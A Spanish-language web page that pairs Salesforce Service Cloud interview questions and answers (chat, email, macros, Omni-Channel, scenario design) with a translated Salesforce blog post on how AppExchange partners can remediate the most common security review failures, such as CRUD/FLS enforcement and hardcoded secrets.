Cuando un cliente llama, la pantalla del agente muestra inmediatamente el nombre del cliente, su historial de compras, problemas anteriores y cualquier otra información relevante. Luego, el agente puede saludar al cliente por su nombre y atender sus necesidades de manera proactiva, a veces incluso antes de que el cliente indique por qué llama. Se trata de hacer que la experiencia de servicio sea fluida y placentera, como tener la mejor mesa lista incluso antes de entrar.

Servicio al cliente en redes sociales

1. ¿Qué es el servicio al cliente social en Salesforce?

¿Sabes cómo puedes chatear con amigos y ver qué están haciendo en las redes sociales? Salesforce permite a las empresas hacer lo mismo con sus clientes. Pueden revolotear y ver lo que la gente dice sobre ellos en las redes sociales.

2. ¿Cómo pueden los agentes utilizar Salesforce para responder a las consultas de los clientes en las redes sociales?

Ya sea que los clientes tuiteen, publiquen en Facebook o compartan historias de Instagram sobre sus experiencias o problemas, los agentes no tienen que desplazarse de una plataforma a otra. Pueden responder a todas estas publicaciones sociales desde su 'colmena' de Salesforce, asegurándose de que nadie se sienta ignorado y que cada problema se resuelva rápidamente.

3. ¿Puedes realizar un seguimiento de las conversaciones de las redes sociales en Service Cloud?

¡Absolutamente! Service Cloud controla todas las conversaciones que ocurren entre la empresa y los clientes en las plataformas sociales. Recuerda quién dijo qué, almacena información sobre los problemas del cliente e incluso cómo se resolvió. De esta manera, si el cliente vuelve a comunicarse, la empresa no hace las mismas preguntas de siempre, sino que continúa la conversación justo donde la dejó, como si retrocediera en el historial de chat con un amigo.

Chat y mensajería

1. ¿Cómo funciona Live Agent en Service Cloud?

Imagínese si estuviera comprando en una gran tienda y en lugar de tener que buscar ayuda por todo el lugar, apareciera un asistente personal a su lado en el momento en que parecía confundido. Así es Live Agent en el mundo online. Es una característica de Service Cloud que permite a los agentes de servicio al cliente chatear en tiempo real con los clientes mientras están en el sitio web para responder preguntas, dar consejos o ayudarlos a encontrar lo que necesitan.

2. ¿Cuáles son los beneficios de utilizar el chat para atención al cliente?

Los clientes obtienen atención instantánea y sus preguntas pueden responderse de inmediato. Además, es muy conveniente porque pueden hacer otras cosas mientras conversan. Para las empresas, significa que pueden manejar varios chats a la vez, lo que es como poder ayudar a varios clientes al mismo tiempo en diferentes líneas de pago.

3. ¿Se pueden automatizar las respuestas en Live Agent?

Sí, si alguien dice "hola", el sistema puede decir automáticamente "¡Hola!". ¿Cómo puedo ayudarte hoy?" Está programado para reconocer palabras o preguntas específicas y luego proporcionar una respuesta preestablecida. Esto significa que el agente no tiene que escribir las mismas respuestas una y otra vez y los clientes obtienen respuestas ultrarrápidas a preguntas comunes.

4. ¿Cómo maneja Salesforce los mensajes SMS para el servicio de atención al cliente?

Salesforce aporta esa comodidad al servicio al cliente. Con las funciones de mensajería SMS, las empresas pueden enviar mensajes de texto a los clientes y los clientes pueden responder. Pueden enviar recordatorios de citas, confirmaciones, actualizaciones rápidas o incluso responder preguntas, todo a través de mensajes de texto. Todo se rastrea y almacena en Salesforce, para que la empresa no pierda la conversación.

Integración de correo electrónico

1. ¿Cómo se utiliza el correo electrónico en Service Cloud?

No se trata sólo de enviar y recibir correos electrónicos; es un sistema completo que gestiona las comunicaciones por correo electrónico con los clientes. Puede mantener un historial de todas las interacciones, para saber exactamente qué se dijo y cuándo.

2. ¿Puedes automatizar las respuestas por correo electrónico?

– ¡Absolutamente! Según ciertas palabras clave en el correo electrónico del cliente o criterios específicos, el sistema puede enviar una respuesta escrita previamente. Es instantáneo, por lo que los clientes no tienen que esperar y les da a los agentes reales más tiempo para manejar los problemas complejos que necesitan un toque humano.

3. ¿Cómo se asegura de que los correos electrónicos de los clientes se envíen a los agentes adecuados?

Utilice el enrutamiento de correo electrónico en Service Cloud. Usando las reglas que usted configura, los correos electrónicos se pueden dirigir a ciertos agentes según el contenido del correo electrónico, la información del cliente o incluso la carga de trabajo de cada agente.

Soporte Móvil

1. ¿Cómo respalda Salesforce el servicio al cliente móvil?

Con la aplicación móvil Salesforce, todo lo que puede hacer en su escritorio, ahora puede hacerlo en su teléfono: verificar los detalles del cliente, actualizar casos o incluso chatear con los clientes.

2. ¿Cuáles son las limitaciones del servicio al cliente móvil en Salesforce?

Dibujos animados y cómics de Parking Boot - imágenes divertidas de CartoonStock

Si bien la aplicación móvil Salesforce es súper poderosa, es un poco como intentar colocar una nave espacial en un lugar de estacionamiento. Algunas tareas o informes complejos pueden resultar difíciles de navegar en una pantalla más pequeña y es posible que ciertas personalizaciones no se muestren como lo hacen en un escritorio.

Métricas y análisis de rendimiento

1. ¿Cómo se mide la satisfacción del cliente en Service Cloud?

En Service Cloud, no solo responde las consultas de los clientes y espera que estén satisfechos; lo verifica utilizando herramientas como encuestas, puntajes CSAT y Net Promoter Scores (NPS). Puede enviarlos automáticamente después de que se resuelva un caso. Es como preguntar: "¿Qué le pareció nuestro servicio?" ¡para que puedas seguir viviendo esa experiencia de servicio cinco estrellas!

2. ¿Qué es una puntuación de satisfacción del cliente (CSAT)?

CSAT es como preguntarle a sus clientes, en una escala del 1 al 5. Es una puntuación que los clientes otorgan en función de su satisfacción con una interacción específica que tuvieron con su equipo de servicio. Cuanto mayor sea la puntuación, mejor trabajo hizo para cumplir (¡o superar!) sus expectativas.

3. ¿Qué es Net Promoter Score (NPS) y cómo se utiliza en Salesforce?

NPS es como preguntar a sus comensales: "¿Recomendaría nuestro restaurante a otras personas?" y luego, dependiendo de su respuesta, se agrupan en Promotores, Pasivos o Detractores. No se trata sólo de un plato de sopa; ¡Lo importante es si toda la experiencia gastronómica les hace querer contárselo a sus amigos! En Salesforce, puede enviar encuestas NPS y luego realizar un seguimiento de su puntuación a lo largo del tiempo, con el objetivo siempre de mejorar la experiencia del curso completo.

4. ¿Se pueden integrar herramientas de encuestas externas con Salesforce?

Puede integrarlo con herramientas de encuestas externas que quizás ya esté utilizando o prefiera, como SurveyMonkey o Google Forms. De esta manera, reúne todos esos comentarios cruciales en un solo lugar, lo que facilita ver el panorama general y tomar decisiones informadas.

Inteligencia artificial (IA)

1. ¿Qué es Salesforce Einstein y cómo se aplica a Service Cloud?

Salesforce Einstein utiliza IA para analizar las diferentes interacciones y datos, predecir las necesidades de los clientes e incluso automatizar las respuestas.

2. ¿Cómo funcionan los Bots de Einstein?

Se encargan de las tareas sencillas y rutinarias del servicio de atención al cliente, como responder preguntas comunes o guiar a un usuario a través de un proceso establecido.

3. ¿Puede Einstein sugerir respuestas a los agentes?

Es como un manual dinámico e inteligente que no sólo tiene todas las respuestas sino que también sabe exactamente cuándo proporcionarlas. Analiza el problema del cliente y proporciona al agente la mejor respuesta o solución, acelerando el servicio y asegurándose de que las "comidas" de su servicio al cliente sean siempre deliciosas.

Servicio de campo

1. ¿Qué es Field Service Lightning?

Vector libre | Banner de camión de comida de estilo de dibujos animados

Imagina que organizas un festival de camiones de comida, donde varios camiones sirven diferentes delicias por todo el lugar. Ahora, Field Service Lightning (FSL) es como tener un coordinador de eventos súper organizado que sabe qué camión de comida está dónde, qué sirven, quién está disponible para servir delicias y quién se toma un descanso. ¡Se trata de administrar su equipo sobre la marcha, asegurándose de que tengan los "ingredientes" correctos (herramientas, piezas) para resolver cualquier desafío "culinario" (problema del cliente) que encuentren en el campo!

2.¿Cómo se integra Field Service Lightning con Service Cloud?

Field Service Lightning, cuando se integra con Service Cloud, brinda información en tiempo real hacia y desde las unidades móviles (FSL), para que todos sepan lo que sucede a su alrededor.

3. ¿Puede programar y enviar agentes de servicio de campo utilizando Salesforce?

¡Absolutamente! Puede planificar horarios, asignar agentes a diferentes trabajos y asegurarse de que estén listos para mejorar sus especialidades según sea necesario. Y si hay una prisa repentina, el sistema puede redirigir a los agentes desde lugares menos concurridos para que ayuden, equilibrando la carga de trabajo y manteniendo contentos a los clientes.

Claro, profundicemos en las macros en Service Cloud de Salesforce con un enfoque conversacional fácil de recordar. ¡Imagínate que estamos charlando en tu cafetería favorita!

macros

1.¿Qué es una macro en Salesforce Service Cloud?

Es un atajo genial que realiza tareas repetitivas por ti. Entonces, si te encuentras haciendo los mismos clics una y otra vez, una macro dice: "¡Oye, ya tengo esto!". ¡Y listo!

2. ¿Todos pueden usar mis Macros?

Si los mantiene públicos, cualquiera puede usarlos. Pero si cree que su macro es secreta, puede guardársela para usted. En Salesforce, se trata de establecer permisos y compartir configuraciones.

3. ¿Pueden las macros interactuar con aplicaciones de terceros en Salesforce?

– Directamente, no. Las macros están diseñadas para automatizar las funcionalidades estándar de Salesforce.

4. ¿Es posible deshacer las acciones de una Macro una vez ejecutada?

No, no hay un botón "deshacer" para las macros. Una vez que se ejecuta una macro, sus acciones se consideran definitivas.

5. ¿Se pueden programar las macros para que se ejecuten a una hora específica?

No, las macros no se pueden programar. Son como un conjunto de herramientas manuales que requieren que alguien las utilice activamente; no funcionan con un temporizador automático.

6. ¿Qué tipo de acciones no puedes realizar con una Macro?

Las macros no pueden manejar procesos complejos de toma de decisiones, interactuar con sistemas externos ni crear registros.

7. ¿Cómo se organizan y gestionan las Macros para un equipo de agentes en Service Cloud?

Utilice carpetas para organizar y compartir colecciones de macros.

8. ¿Se puede modificar una macro activa? ¿Hay que tomar alguna precaución?

Sí, puede editar una macro y probar las modificaciones antes de su uso generalizado.

9. ¿Es posible asignar Macros específicas a usuarios o perfiles específicos?

Si bien no puede asignar una macro directamente a usuarios específicos, puede controlar el acceso utilizando las carpetas de macros y la configuración de uso compartido de Salesforce.

10. ¿Cómo se relacionan las macros con la API de Salesforce?

Las macros no interactúan directamente con la API de Salesforce. Funcionan dentro de la interfaz de usuario, automatizando las acciones manuales del usuario.

11. ¿Se pueden utilizar las macros junto con Salesforce Flows?

Las macros y los flujos tienen diferentes propósitos. Mientras que las Macros automatizan las acciones del usuario, los Flujos automatizan los procesos en el backend.

12. ¿Cómo funciona el manejo de errores con Macros?

Si una macro encuentra un problema durante la ejecución, se detiene y se muestra un mensaje de error.

13. ¿Pueden los usuarios sin privilegios de administrador crear o modificar macros?

Los usuarios pueden crear macros personales, pero crear o modificar macros compartidas normalmente requiere ciertos permisos o privilegios de administrador.

14. ¿Existe alguna forma de realizar un seguimiento de los cambios realizados por una Macro?

No existe un mecanismo de seguimiento directo para las macros, pero puede utilizar las funciones de seguimiento de auditoría estándar de Salesforce para ver los cambios en los registros.

15. ¿Cuál es el papel de las instrucciones macro en el proceso de creación?

Las instrucciones macro son el corazón de la macro y dictan qué acciones realiza. Elaborarlos es como escribir una lista detallada de tareas pendientes para otra persona; es necesario especificar cada paso de forma clara y en orden.

29. ¿Puedes usar macros para enviar correos electrónicos con archivos adjuntos?

No, las macros pueden automatizar el proceso de envío de un correo electrónico, pero no pueden agregar archivos adjuntos.

Omnicanal

1. ¿Puedes explicar qué es OmniCanal en Salesforce?

Conozca todo sobre: OmniCanal en Salesforce

OmniCanal es una característica de Salesforce que permite la gestión de elementos de trabajo entrantes desde diferentes canales de comunicación. Se trata de dirigir el trabajo adecuado a los agentes adecuados en el momento adecuado, en función de su disponibilidad y capacidad, garantizando que las cargas de trabajo se gestionen de manera eficiente.

2: ¿Cómo beneficia OmniCanal a un equipo de servicio al cliente?

OmniChannel ayuda a los equipos de servicio al cliente al distribuir el trabajo de manera uniforme entre los agentes, reducir los tiempos de espera de los clientes y permitir que los agentes manejen el trabajo desde varios canales dentro de una sola plataforma. Este enfoque simplificado conduce a un mejor servicio al cliente y una mayor productividad de los agentes.

3. ¿Cuál es la diferencia entre OmniCanal y distribución del trabajo tradicional?

La distribución tradicional del trabajo a menudo implica una asignación manual, lo que puede llevar mucho tiempo y ser ineficiente. OmniChannel, por otro lado, dirige automáticamente el trabajo a los agentes más adecuados según criterios preestablecidos y la disponibilidad de los agentes en tiempo real, lo que hace que el proceso sea más rápido y eficiente.

4. ¿Puede explicar el “Estado de presencia” en OmniCanal?

“Estado de presencia” se refiere a la disponibilidad actual de un agente para recibir trabajo. Los agentes pueden configurar su estado para mostrar si están disponibles, ocupados o ausentes, y OmniCanal utiliza esta información para enrutarles el trabajo en consecuencia.

5. ¿Cómo garantiza OmniCanal que los casos de alta prioridad se manejen rápidamente?

OmniCanal permite a los administradores establecer niveles de prioridad para diferentes tipos de trabajo. Cuando llegan elementos de trabajo, se enrutan automáticamente según estos niveles de prioridad. Los elementos de alta prioridad se envían al principio de la cola para que se atiendan más rápido.

6. ¿Se puede integrar OmniCanal con otras funciones de Salesforce?

Sí, OmniCanal se integra perfectamente con otras funciones de Salesforce. Por ejemplo, funciona con Service Cloud para gestionar procesos de atención al cliente, Sales Cloud para procesos de ventas e incluso aplicaciones personalizadas de Salesforce.

7. ¿Cómo admite OmniCanal los diferentes canales de comunicación?

OmniCanal es versátil al admitir varios canales de comunicación como correo electrónico, chat, SMS y redes sociales. Dirige todos estos diferentes tipos de trabajo a los agentes a través de la misma plataforma, garantizando un enfoque unificado del servicio al cliente.

8. ¿Puede describir un escenario en el que el enrutamiento omnicanal podría resultar beneficioso?

Imagine un escenario en el que hay un gran volumen de solicitudes de servicio entrantes y una cantidad limitada de agentes disponibles. OmniCanal dirige eficientemente las solicitudes a los agentes disponibles según sus habilidades, carga de trabajo y prioridad de los casos, garantizando una carga de trabajo equilibrada y respuestas oportunas.

9. ¿Cuáles son los tipos de Omni Channel?

Basado en cola → Asignar agentes a la cola

Basado en habilidades → Asignar habilidades a los agentes

Enrutamiento externo → Configuración de enrutamiento de terceros

10. ¿Cómo configurar Omni Channel?

  1. Habilite OmniCanal.
  2. Crear canales de atención.
  3. Cree configuraciones de enrutamiento.
  4. Asociar configuraciones de enrutamiento y agentes con colas.
  5. Crear configuraciones de presencia.
  6. Crear estados de presencia.
  7. Agregue el widget omnicanal.

11. ¿Cómo crear un Canal de Atención?

Se puede crear un canal de servicio para cualquier objeto de Salesforce, como un caso, cliente potencial, sesión SOS o objeto personalizado.

12. ¿Cómo crear una configuración de enrutamiento?

Las configuraciones de enrutamiento determinan cómo se enrutan los elementos de trabajo a los agentes.

Utilícelos para priorizar la importancia relativa y el tamaño de los elementos de trabajo de sus colas.

13. ¿Explicar los ajustes de configuración de enrutamiento?

Prioridad de ruta:

El orden en el que los elementos de trabajo de la cola asociados con esta configuración de enrutamiento se enrutan a los agentes. Los objetos en colas con un número menor se enrutan primero a los agentes.

Modelo de enrutamiento:

Determina cómo se enrutan los elementos de trabajo entrantes a los agentes asignados al canal de servicio de configuración.

Tiempo de espera de empuje (segundos):

Establece un límite de tiempo para que un agente responda a un elemento antes de enviarlo a otro agente.

Unidades de Capacidad:

Cantidad de capacidad total del agente.

Preguntas basadas en escenarios

1. ¿Cómo diseñaría una solución para respaldar a un equipo de soporte multilingüe que utiliza Service Cloud?

Service Cloud de Salesforce admite equipos multilingües mediante el uso de funciones como Translation Workbench, que le permite traducir objetos estándar y personalizados, reglas de validación, etiquetas de campo y más, a cualquiera de los idiomas admitidos.

Además, los artículos de conocimiento se pueden escribir y traducir a varios idiomas, lo que permite a los agentes de soporte acceder y proporcionar información en varios idiomas.

También puede configurar OmniCanal para enrutar casos a los agentes adecuados según sus habilidades lingüísticas. De esta manera, los clientes pueden interactuar con el soporte en su idioma preferido, mejorando la satisfacción del cliente.

2. ¿Puede explicarme el proceso de diseño de una solución de Service Cloud que incorpore reglas de escalamiento de casos y SLA para garantizar una resolución oportuna del caso?

  1. Es necesario definir los SLA, es decir, el tiempo dentro del cual se deben resolver casos de ciertos tipos o prioridades.
  2. Una vez definidos, configurará los procesos de derechos para especificar el cronograma para cada etapa de resolución del caso.
  3. Luego, usaría Milestones dentro de estos procesos para rastrear si los casos se están resolviendo dentro de los SLA definidos.
  4. Las reglas de escalamiento de casos se usarían para escalar casos que estén en peligro de violar sus SLA. Estos se pueden configurar para escalar según la antigüedad del caso, la prioridad o incluso si el caso ha estado inactivo. Los casos escalados pueden luego remitirse automáticamente a agentes o supervisores con más experiencia para recibir atención urgente.

3. ¿Cómo abordaría el diseño de una solución para un centro de llamadas a gran escala que necesita gestionar grandes volúmenes de casos y llamadas?

– Para los centros de llamadas de gran volumen, le conviene aprovechar la función OmniCanal de Service Cloud, que garantiza que los casos se dirijan a los agentes adecuados según su disponibilidad y conjunto de habilidades, lo que ayuda a gestionar la carga de trabajo de manera eficiente. La integración de la telefonía mediante Open CTI permite a los agentes recibir y realizar llamadas directamente dentro de Salesforce, garantizando que tengan toda la información relevante del cliente al alcance de su mano.

4. ¿Cuál es su experiencia con la integración de aplicaciones de terceros en Service Cloud y cómo ha abordado la solución de problemas de integración en el pasado?

Mi enfoque implica primero garantizar que la aplicación de terceros tenga una documentación API sólida y cumpla con las mejores prácticas de seguridad y cumplimiento. Salesforce ofrece varias formas de integración, como mediante API REST o SOAP, servicios externos o incluso mediante aplicaciones AppExchange, si están disponibles.

5. ¿Cómo diseñaría una solución que utilice Service Cloud para rastrear la opinión del cliente e incorporar esa información en los flujos de trabajo de gestión de casos?

Service Cloud puede integrarse con herramientas que ofrecen análisis de sentimientos, incluido Einstein Sentiment de Salesforce. Al analizar el texto de las interacciones con los clientes (correos electrónicos, transcripciones de chat, publicaciones en redes sociales), se puede determinar el sentimiento (positivo, neutral, negativo). Estos datos de opinión se pueden almacenar como un campo en el objeto Caso o en un objeto personalizado relacionado.

6. ¿Puede dar un ejemplo de cómo ha utilizado Service Cloud para mejorar las capacidades de autoservicio del cliente y reducir la cantidad de solicitudes de soporte entrantes?

Una estrategia eficaz es implementar una comunidad o portal de clientes utilizando Salesforce Community Cloud, integrado con Service Cloud. Aquí se puede acceder a los artículos de la base de conocimientos, lo que permite a los clientes encontrar respuestas a sus preguntas. También se pueden crear casos directamente desde la comunidad y los clientes pueden verificar su estado sin necesidad de comunicarse con el soporte. La implementación de un chatbot a través de Einstein Bots también puede desviar consultas rutinarias al proporcionar respuestas automáticas a preguntas comunes.

7. ¿Has trabajado con Service Cloud Voice? ¿Cómo ha utilizado esta tecnología para mejorar el rendimiento del call center y la satisfacción del cliente?

Service Cloud Voice integra la telefonía en Salesforce, brindando una vista unificada del cliente y transcripción de llamadas en tiempo real. Esto permite a los agentes centrarse más en el cliente que en tomar notas. La transcripción en tiempo real, impulsada por Einstein, también puede proporcionar sugerencias para el siguiente paso, ayudando a los agentes más nuevos. La conclusión posterior a la llamada se acelera porque los datos de la llamada ya están en Salesforce, lo que reduce el trabajo posterior a la llamada y, en consecuencia, los tiempos de espera para los clientes. Los datos históricos de llamadas brindan información valiosa para el análisis de la opinión del cliente y el desempeño de los agentes, lo que impacta positivamente la capacitación y la satisfacción del cliente.

8. ¿Cómo abordaría el diseño de una solución para una empresa que opera en varios países con diferentes regulaciones de privacidad de datos?

– El cumplimiento de diversas normas de privacidad de datos se puede gestionar en Service Cloud mediante el uso de funciones como opciones de residencia de datos para almacenar datos en regiones específicas, enmascaramiento de datos, cifrado, seguridad a nivel de campo y reglas de acceso a registros para controlar quién puede acceder a qué datos.

9. ¿Cómo ha abordado los problemas de escalabilidad y rendimiento al diseñar soluciones de Service Cloud para grandes empresas?

  • Para las grandes empresas, las consideraciones incluyen la gestión del volumen de datos, el uso de las herramientas de optimización del rendimiento integradas de Salesforce y la revisión periódica de la organización para eliminar configuraciones y personalizaciones obsoletas.
  • También es importante diseñar con una mentalidad de “clics, no código” para minimizar el código personalizado, que puede introducir complejidad y sobrecarga de rendimiento.
  • Cuando es necesario un código personalizado, es vital seguir las mejores prácticas para la masificación y las consultas SOQL eficientes. Finalmente, el monitoreo a través del Optimizador, Health Check y otras herramientas de Salesforce puede ayudar a identificar y mitigar problemas de rendimiento de manera proactiva.

10. ¿Cómo ha utilizado Service Cloud para mejorar la retención de clientes y reducir las tasas de abandono?

En Service Cloud, la retención de clientes se puede mejorar significativamente utilizando las sólidas funciones de servicio al cliente de la plataforma. Por ejemplo, aprovecho las capacidades de análisis e informes de Service Cloud para realizar un seguimiento de las puntuaciones de satisfacción del cliente e identificar problemas comunes que provocan la insatisfacción del cliente. Al integrar los comentarios directamente en el sistema de gestión de casos, los agentes pueden abordar las inquietudes de manera proactiva antes de que se intensifiquen, lo que impacta directamente en la satisfacción y retención del cliente. Además, características como la comunicación personalizada con el cliente, artículos de conocimiento para el autoservicio y la resolución eficiente de casos a través del enrutamiento y escalamiento automatizados de casos ayudan a mantener una experiencia positiva para el cliente, reduciendo así la deserción.

11. ¿Ha trabajado con la funcionalidad Live Agent de Service Cloud? ¿Cómo ha utilizado esta tecnología para mejorar las experiencias de atención al cliente?

Sí, utilicé Live Agent dentro de Service Cloud para mejorar el soporte que reciben los clientes en tiempo real. Al integrar Live Agent, los clientes pueden chatear instantáneamente con agentes de soporte, lo que reduce los tiempos de espera y mejora la satisfacción general. Descubrí que incorporar el chat de Live Agent en sitios web y aplicaciones móviles donde los clientes son más activos reduce significativamente la barrera para acceder al soporte.

12. ¿Puede describir cómo diseñaría una solución de Service Cloud que incorpore el enrutamiento automatizado de casos al agente apropiado según el problema del cliente y el conjunto de habilidades del agente?

Para lograr esto, aprovecharíamos la función OmniCanal, que permite enrutar los casos según el conjunto de habilidades, la disponibilidad y la carga de trabajo del agente.

  1. Comenzaría por definir varios conjuntos de habilidades de agentes dentro del sistema y asociaría estas habilidades con los agentes correspondientes.
  2. Luego, establecía configuraciones de enrutamiento, donde los casos entrantes se evalúan según criterios predefinidos relacionados con el problema del cliente y luego se los relaciona con un agente que posee el conjunto de habilidades requerido.

13. ¿Cómo abordaría el diseño de una solución de Service Cloud que pueda manejar grandes volúmenes de casos manteniendo tiempos de respuesta consistentes y niveles de satisfacción del cliente?

  • Primero, implementaría reglas de asignación de casos para automatizar la distribución de casos a los agentes o colas correctos.
  • Luego, utilizaría la función de reglas de escalamiento de casos de Service Cloud para priorizar casos urgentes o de alto impacto.
  • Para mantener tiempos de respuesta constantes, se pueden utilizar funciones como reglas de respuesta automática para reconocer inmediatamente los envíos de casos.
  • Además, integraría una base de conocimientos integral para facilitar las opciones de autoservicio, reduciendo así la carga de casos para los agentes.

50% Me gusta VS
50% No me gusta

Seguir leyendo

Las 20 vulnerabilidades principales encontradas en la revisión de seguridad de AppExchange ☁️

Las 20 vulnerabilidades principales encontradas en la revisión de seguridad de AppExchange ☁️

Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .

El enlace a la publicación original, lo encontrarás al final de este artículo.

Las 20 principales vulnerabilidades encontradas en la revisión de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisión de seguridad de AppExchange es uno de los procesos de revisión más rigurosos de cualquier mercado de aplicaciones en línea. Esta estricta reputación es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor número uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los más altos estándares de seguridad posibles para la protección de los datos de los clientes.

Dicho esto, estos estándares pueden representar un desafío importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener éxito, en orden de prevalencia, esta publicación analizará las 20 razones principales por las que los socios no pasan la revisión de seguridad (a partir de 2023). También cubriremos cómo remediar o prevenir estos problemas.

#1 — Aplicación de CRUD/FLS

¿Qué es esto?

Las vulnerabilidades de aplicación de la seguridad a nivel de objetos y campos (CRUD/FLS) son la razón principal (por un margen significativo) para no pasar la revisión de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene algún código de Salesforce, este problema debe ser su prioridad número uno a resolver antes de enviarlo para una revisión de seguridad.

¿Cómo puedo abordar esto?

Si, durante su proceso de codificación, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querrá hacer una revisión muy exhaustiva de su código base para asegurarse de que no esté realizar cualquier operación de creación/lectura/actualización/eliminación no marcada en objetos o campos.

El método preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer aún no lo admiten completamente (al momento de escribir esta publicación, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protección arrojará falsos positivos). Code Analyzer Graph Engine es actualmente la única herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentación para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, métodos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensión PMD para VS Code pueden ser útiles herramientas que puede utilizar para comprobar su código base. Puede seguir nuestra guía para obtener más información sobre cómo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El escáner Checkmarx debe utilizarse como verificación final de violaciones de CRUD/FLS. Puede ejecutar este análisis a través del Portal de seguridad para socios .

Obtenga más información sobre la aplicación de CRUD/FLS en Trailhead .

#2 – Versión de software insegura

¿Qué es esto?

Esto significa que alguna pieza de software (normalmente, una versión específica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayoría de las veces, es porque estás usando una versión desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la más común), pero también podría ser algo así como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

¿Cómo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnologías que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de código abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas públicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. También puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su código base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentación de falsos positivos para argumentar que un CVE particular registrado no podría aplicarse a su oferta, ya que quizás no esté utilizando la funcionalidad asociada con ese CVE.

#3 – Violación al compartir

¿Qué es esto?

Básicamente, esto significa que tiene clases de Apex en las que no ha agregado explícitamente la palabra clave with sharing al encabezado de la clase, omitiendo así las reglas de uso compartido de una organización.

¿Cómo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y asegúrese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicación a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede aún más claro).

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Obtenga más información sobre cómo compartir el cumplimiento a través de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

¿Qué es esto?

Los secretos no deben estar codificados en el código fuente. Aunque el código puede estar contenido en un paquete administrado donde el código está oculto para los clientes, todavía existen razones por las que esta es una práctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podrá actualizarlo por sí mismo.

¿Cómo puedo abordar esto?

Asegúrese de que no haya secretos codificados en el código fuente, incluso si es un paquete administrado. Asegúrese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso específico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuración personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga más información sobre el almacenamiento seguro de secretos en Trailhead .

#5 — Configuración TLS/SSL

¿Qué es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es válido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si están en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

¿Cómo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisión de seguridad ejecutará este análisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su solución. Si sus terminales no reciben una calificación A por cumplimiento de SSL/TLS, su revisión de seguridad no será aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar más detalles sobre los requisitos de TLS en las notas de la versión .

#6 — Información confidencial en depuración

¿Qué es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra información confidencial, como secretos de aplicaciones, datos del sistema o información de depuración demasiado detallada, a través de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado está habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisión de seguridad de AppExchange.

¿Cómo puedo abordar esto?

En su paquete de Salesforce, asegúrese de buscar en su código fuente todas las declaraciones de depuración del paquete para asegurarse de que no registren información confidencial o secretos.

Asegúrese de que los códigos de error y los mensajes de error en toda su solución tengan un nivel de información apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deberían ver seguimientos de pila completos ni información de depuración detallada. De manera similar, asegúrese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

